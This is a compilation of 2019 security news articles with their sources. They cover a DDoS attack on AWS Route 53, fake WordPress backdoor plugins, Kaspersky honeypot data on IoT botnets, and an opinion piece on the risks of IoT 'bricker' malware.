Google Cloud Platform suffered issues around the same time as Amazon Web Services but claims they were not caused by DDoS.

A significant distributed denial-of-service (DDoS) attack lasting approximately eight hours affected Amazon Web Services yesterday, knocking its S3 service and other services offline between 10:30 a.m. and 6:30 p.m. PDT.

The attack struck AWS’s Router 53 DNS Web service, which led to outages for other services that require public DNS resolution: Elastic Load Balancing, Relational Database Service, and Elastic Compute Cloud. AWS alerted customers while the attack was ongoing to inform them of “intermittent errors with resolution of some AWS DNS names.” Starting at 5:16 p.m., a small number of specific DNS names experienced a higher error rate. The issues have been resolved.

Amazon says its Shield Advanced DDoS mitigation tool helped in managing the attack; however, some users were unable to connect because it categorized legitimate customer queries as malicious.

Around the same time as the AWS attack, Google Cloud Platform also experienced a range of problems. It’s believed the incidents are separate; GCP claims its issue was unrelated to DDoS.

Source: https://www.darkreading.com/cloud/eight-hour-ddos-attack-struck-aws-customers/d/d-id/1336165

 

Outages lasted for a full working day as the Route 53 DNS system was disrupted

Businesses were unable to service their customers for approximately eight hours yesterday after Amazon Web Services (AWS) servers were struck by a distributed denial-of-service (DDoS) attack.

After initially flagging DNS resolution errors, customers were informed that the Route 53 domain name system (DNS) was in the midst of an attack, according to statements from AWS Support circulating on social media.

From 6:30pm BST on Tuesday, a handful of customers suffered an outage to services while the attack persisted, lasting until approximately 2:30am on Wednesday morning, when services to the Route 53 DNS were restored. This was the equivalent of a full working day in some parts of the US.

“We are investigating reports of occasional DNS resolution errors. The AWS DNS servers are currently under a DDoS attack,” said a statement from AWS Support, circulated to customers and published across social media.

“Our DDoS mitigations are absorbing the vast majority of this traffic, but these mitigations are also flagging some legitimate customer queries at this time. We are actively working on additional mitigations, as well as tracking down the source of the attack to shut it down.”

The Route 53 system is a scalable DNS that AWS uses to give developers and businesses a method to route end users to internet applications by translating URLs into numeric IP addresses. This effectively connects users to infrastructure running in AWS, like EC2 instances, and S3 buckets.

During the attack, AWS advised customers to try to update the configuration of clients accessing S3 buckets to specify the region their bucket is in when making a request to mitigate the impact of the attack. SDK users were also asked to specify the region as part of the S3 configuration to ensure the endpoint name is region-specific.

Rather than infiltrating targeted software or devices, or exploiting vulnerabilities, a typical DDoS attack hinges on attackers bombarding a website or server with an excessive volume of access requests. This causes it to undergo service difficulties or go offline altogether.

All AWS services have been fully restored at the time of writing, however, the attack struck during a separate outage affecting Google Cloud Platform (GCP), although there’s no indication the two outages are connected.

From 12:30am GMT, GCP’s cloud networking system began experiencing issues in its US West region. Engineers then learned the issue had also affected a swathe of Google Cloud services, including Google Compute Engine, Cloud Memorystore, the Kubernetes Engine, Cloud Bigtable and Google Cloud Storage. All services were gradually repaired until they were fully restored by 4:30am GMT.

While outages on public cloud platforms are fairly common, they are rarely caused by DDoS attacks. Microsoft’s Azure and Office 365 services, for example, suffered a set of routine outages towards the end of last year and the beginning of 2019.

One instance includes a global incident with US government services and LinkedIn sustaining an authentication outage towards the end of January this year.

Source: https://www.cloudpro.co.uk/cloud-essentials/public-cloud/8276/aws-servers-hit-by-sustained-ddos-attack

Security researchers have discovered fake WordPress plugins that act as backdoors for hackers and could be used to carry out DDoS and brute force attacks.

Security researchers have discovered fake WordPress plugins that act as backdoors for hackers and could be used to carry out DDoS and brute force attacks.
According to a blog post by researchers at Securi, the fake plugins have a similar structure along with header comments to the popular backup/restore plugin UpdraftPlus. That plugin is a legitimate piece of software designed to help backup WordPress websites.
Researchers said that hackers have used different names for these fake plugins, including initiatorseo or updrat123.
“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” said researchers.
The plugin hides itself from WordPress users who don’t use browsers with specific User-Agent strings. These strings vary from plugin to plugin. The plugin can’t be seen in the dashboard. However, if an attacker adds a specific GET parameter to requests, such as initiationactivity or testingkey, the plugin will report its presence.
The primary purpose of these plugins is to serve as a backdoor, which allows attackers to upload arbitrary files to compromised websites. Researchers said that malicious requests come in the form of POST parameters, which specify a remote URL for the file download locations, along with the path and name of the file to be created on the compromised server.
Researchers said that the names of these POST parameters have been unique for each plugin that they have analysed.
“In our experience, hackers have been using this backdoor to upload web shells to seemingly random locations,” said researchers.
Randomly named scripts have been uploaded to a website’s root directories to carry out brute force attacks on other sites. Researchers said that while none of the approaches used by this attack are new, it clearly demonstrates how cleaning only the visible parts of an infection is not enough.
“Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface,” said researchers.
They added that compromised websites may be used for malicious activity that is completely invisible from outside, including DDoS and brute-force attacks, mailing tons of spam, or cryptomining.
Jake Moore, cyber-security specialist at ESET, told SC Media UK that plugins can be an essential way to make your life more streamlined, but like with any application or e-commerce website that is unknown, reviews are there to help the user to separate the wheat from the chaff.
“Moreover, it is vital not to reuse passwords online and to make sure they are all complex – even if this becomes a hassle for multiple users who manage the sites. Password managers are no longer an inconvenience and reusing passwords will get you into a lot of troubled waters, not just with this issue. Naturally, patching is also key with all updates, but it is vital that users only download what they entirely need in terms of plugins. Many people can tend to keep plugins running even after a one time use, but it’s always best practice to keep only what is used regularly,” he said.
Javvad Malik, security awareness advocate at KnowBe4, told SC Media UK that companies should be wary of what plugins they are allowing on their site.
“While it may be tempting to install a novel plugin, one has to stop and ask whether it fulfils the needs of the business or if it is just a gimmick or nice to have,” he said.
“They should also audit and gain assurance for plugins and overall website functionality on a regular basis. This can be done with a combination of technical controls including scans, as well as periodically allowing experts to manually check, which can include reviewing logs, or conducting penetration tests.”
Source: https://www.scmagazineuk.com/look-inside-wordpress-plugins-fakes-used-cyber-criminals-plant-backdoors/article/1663135

Kaspersky honeypots – networks of virtual copies of various internet connected devices and applications – have detected 105 million attacks on IoT devices addresses in H1 2019.

Kaspersky honeypots – networks of virtual copies of various internet connected devices and applications – have detected 105 million attacks on IoT devices coming from 276,000 unique IP addresses in the first six months of the year. This figure is around nine times more than the number found in H1 2018, when only around 12 million attacks were spotted originating from 69,000 IP addresses. Capitalizing on weak security of IoT products, cybercrimanls are intenfsifying their attempts to create and monetize IoT botnets.This and other findings are a part of the ‘IoT: a malware story’ report on honeypot activity in H1 2019.

Cyberattacks on IoT devices are booming, as even though more and more people and organizations are purchasing ‘smart’ (network-connected and interactive) devices, such as routers or DVR security cameras, not everybody considers them worth protecting. Cybercriminals, however, are seeing more and more financial opportunities in exploiting such gadgets. They use networks of infected smart devices to conduct DDoS attacks or as a proxy for other types of malicious actions. To learn more about how such attacks work and how to prevent them, Kaspersky experts set up honeypots – decoy devices used to attract the attention of cybercriminals and analyze their activities. 

Based on data analysis collected from honeypots, attacks on IoT devices are usually not sophisticated, but stealth-like, as users might not even notice their devices are being exploited. The malware family behind 39% of attacks – Mirai – is capable of using exploits, meaning that these botnets can slip through old, unpatched vulnerabilities to the device and control it. Another technique is password brute-forcing, which is the chosen method of the second most widespread malware family in the list – Nyadrop. Nyadrop was seen in 38.57% of attacks and often serves as a Mirai downloader. This family has been trending as one of the most active threats for a couple of years now. The third most common botnet threatening smart devices – Gafgyt with 2.12% – also uses brute-forcing.

In addition, the researchers were able to locate the regions that became sources of infection most often in H1 2019. These are China, with 30% of all attacks taking place in this country, Brazil saw 19% and this is followed by Egypt (12%). A year ago, in H1 2018 the situation was different, with Brazil leading with 28%, China being second with 14% and Japan following with 11%.

“As people become more and more surrounded by smart devices, we are witnessing how IoT attacks are intensifying. Judging by the enlarged number of attacks and criminals’ persistency, we can say that IoT is a fruitful area for attackers that use even the most primitive methods, like guessing password and login combinations. This is much easier than most people think: the most common combinations by far are usually “support/support”, followed by “admin/admin”, “default/default”. It’s quite easy to change the default password, so we urge everyone to take this simple step towards securing your smart devices” – said Dan Demeter, security researcher at Kaspersky Lab.

To keep your devices safe, Kaspersky recommends users:

Install updates for the firmware you use as soon as possible. Once a vulnerability is found, it can be fixed through patches within updates.

Always change preinstalled passwords. Use complicated passwords that include both capital and lower case letters, numbers and symbols if it’s possible.

Reboot a device as soon as you think it’s acting strangely. It might help get rid of existing malware, but this doesn’t reduce the risk of getting another infection.

Keep access to IoT devices restricted by a local VPN, allowing you to access them from your “home” network, instead of publicly exposing them on the internet.

Kaspersky recommends companies to take the following measures:

Use threat data feeds to block network connections originating from malicious network addresses detected by security researchers. 

Make sure all devices software is up to date. Unpatched devices should be kept in a separate network inaccessible by unauthorised users.

Source: https://www.ameinfo.com/industry/technology/iot-more-than-100-million-attacks-on-smart-devices-h1-2019

Infosec vigilantism can cause serious harm in the era of industrial IoT and connected medical devices.

For several years now, security experts have been trying to bring attention to the growing threat that insecure Internet of Things (IoT) devices pose to networks around the world. The enormous growth in popular connected devices like webcams, DVRs, and smart watches has made it possible for hackers to amass huge botnets that can launch devastating distributed denial-of-service (DDoS) attacks.

Unfortunately, some vigilante hackers have tried to solve this problem with “bricker” malware that infects and destroys insecure IoT devices before they can become part of a botnet. This might seem like a positive on the surface, but this tactic creates serious, sometimes life-threatening risks as more IoT devices are used in industrial networks and healthcare organizations.

Let’s start at the beginning. IoT security became a top-of-mind issue in late 2016 thanks to the record-breaking DDoS attacks by the Mirai botnet and its subsequent source code release. In a perfect world, this should have been the wake-up call to improve IoT security. Unfortunately, slim profit margins and rapid development times kept IoT security considerations on the back burner and led some individuals to take matters into their own hands. The first instance of IoT vigilantism was in 2017 when a strain of malware known as BrickerBot began making its rounds.

Similar to the Mirai botnet, BrickerBot exploited flaws like insecure, hard-coded passphrases to log in to vulnerable IoT devices. But once it connected to a device, it didn’t add it to a massive botnet. Instead, it deleted files, corrupted the system storage, and disconnected the device from the Internet, effectively making it unusable. While it is possible to restore the device to factory defaults, the average IoT user likely doesn’t have the technical skills to do this. The author of BrickerBot, known by the pseudonym Janit0r, explained in an interview that his malware was intended to prevent devices from being infected by Mirai. Janit0r believed that if IoT manufacturers and owners weren’t going to take security seriously, then the devices shouldn’t exist to begin with.

In the end, BrickerBot destroyed over 10 million devices in just nine months before Janit0r retired it from service. While that may sound like a lot, it’s still less than one-tenth of 1% of the estimated 14 billion IoT devices online worldwide.

But the end of BrickerBot wasn’t the end of IoT bricking malware. In early 2019, a new variant of IoT bricking malware called Silex began infecting devices worldwide. Within a few hours, Silex had infected thousands of devices, deleting system file and firewall rules, and effectively rendering them useless. With the Mirai source code public, it’s not a stretch to think there are other similar malware variants lurking undiscovered in the wild today. Thankfully, individual IoT owners can also protect themselves from both botnets and brickers by changing the default passwords on their IoT devices, not exposing the telnet port (which BrickerBot uses to infect devices) and performing basic network segmentation and monitoring.

Bricker malware is dangerous because it doesn’t discriminate between different types of IoT devices. Almost every industry is incorporating IoT technology in some way. “Smart city” technology is becoming widely adopted across the globe, with municipalities connecting everything from power grids to traffic lights to networks. Healthcare is another sector that’s quickly adopting IoT technology, with the Internet of Medical Things projected to reach $136.8 billion worldwide by 2021. While some might question the need for refrigerators to connect to the Internet, there is no arguing that the ability to quickly share data from an ECG/EKG machine could be the difference between life and death. As widespread IoT adoption continues to grow within these sectors and overall, bricking malware can have some devastating consequences.

The problem is that many of these new IoT applications exhibit the same security lapses as consumer IoT devices, but with significantly higher risks if they fail. A rash of bricked industrial IoT sensors could cause widespread power outages, and an infusion pump or medical monitor that unexpectedly shuts off could put patients’ lives at risk. The authors of BrickerBot and Silex might not have been so ready to claim their work was for the good of the Internet if they truly considered the serious collateral damage that they might cause along the way.

There are other options to improve IoT security that don’t involve such a high degree of risk. Security researchers can work on raising awareness about connected device security, participating in public education initiatives and trying to drum up consumer demand for secure devices. Just last year the state of California, the fifth-largest economy in the world by GDP compared with other sovereign nations, passed Senate Bill 327, which mandates that manufacturers of connected devices equip their products with reasonable security features by January 2020. While the bill will have little effect on the masses of inexpensive IoT devices imported from foreign countries every year, it’s a step in the right direction that can be built upon with future legislation.

There is no denying the IoT industry needs to fundamentally change its approach to security, but vigilantism is not the answer. There are less destructive ways to convince both manufacturers and consumers that developing and deploying secure devices is worth the investment.

Source: https://www.darkreading.com/iot/why-bricking-vulnerable-iot-devices-comes-with-unintended-consequences-/a/d-id/1336009